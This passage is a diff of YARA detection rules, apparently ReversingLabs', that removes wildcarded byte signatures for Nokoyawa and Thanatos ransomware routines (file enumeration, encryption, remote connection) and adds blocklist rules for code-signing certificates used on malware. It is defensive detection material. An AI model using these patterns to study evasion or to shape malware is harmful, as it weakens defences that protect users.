-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ??
-            ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ??
-            8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A
-            ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
-            89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B
-        }
-		$remote_connection_p2 = {
-            00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ??
-            72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0
-            75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56
-            6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$enum_resources_p1 = {
-            33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56
-            ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B
-            06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ??
-            C7 45 ?? ?? ?? ?? ?? 0F 82
-        }
-		$enum_resources_p2 = {
-            8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A
-            ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ??
-            8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ??
-            ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$enum_resources_p3 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
-            64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
-            8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ??
-            8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ??
-            0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ??
-            8D 51 ?? 3B D0 74
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aidem Media Limited" and pe.signatures [ i ] . serial == "57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12628-L12646"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUPITER-STROI, OOO" and ( pe.signatures [ i ] . serial == "00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures [ i ] . serial == "ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" ) and 1491177600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nokoyawa ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "31470ce4-381f-50d2-bbca-03c592e62a7d"
-		date = "2022-06-06"
-		modified = "2022-06-06"
+		id = "94128695-0206-5c04-b792-34400f8ce890"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12648-L12664"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nokoyawa"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares = {
-            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ??
-            8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0
-            E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24
-            ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C
-            24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24
-            ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B
-            C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0
-            ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B
-            4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ??
-            ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF
-            15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
-        }
-		$find_files_p1 = {
-            FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83
-            E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ??
-            ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48
-        }
-		$find_files_p2 = {
-            98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ??
-            0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B
-            8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ??
-            ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48
-            81 C4
-        }
-		$encrypt_files = {
-            48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
-            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ??
-            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2
-            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ??
-            48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7
-            40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
-            48 89 48 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ??
-            48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D
-            15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ??
-            48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
-            ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8
-            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $enum_shares ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rabah Azrarak" and pe.signatures [ i ] . serial == "0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Thanatos ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "190adbd0-30a7-5619-ab70-3ab031ece2f7"
-		date = "2020-11-13"
-		modified = "2020-11-13"
+		id = "3578b97f-1d87-517a-8ea9-17606017e46a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12666-L12682"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Thanatos"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF
-            15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ??
-            ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ??
-            ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ??
-            74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2
-            50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD
-            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ??
-            ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50
-            89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55
-            ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-            C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B
-            1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF
-            D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ??
-            ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0
-            74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89
-            33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF
-            15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ??
-            6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0
-            56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B
-            00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ??
-            72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ??
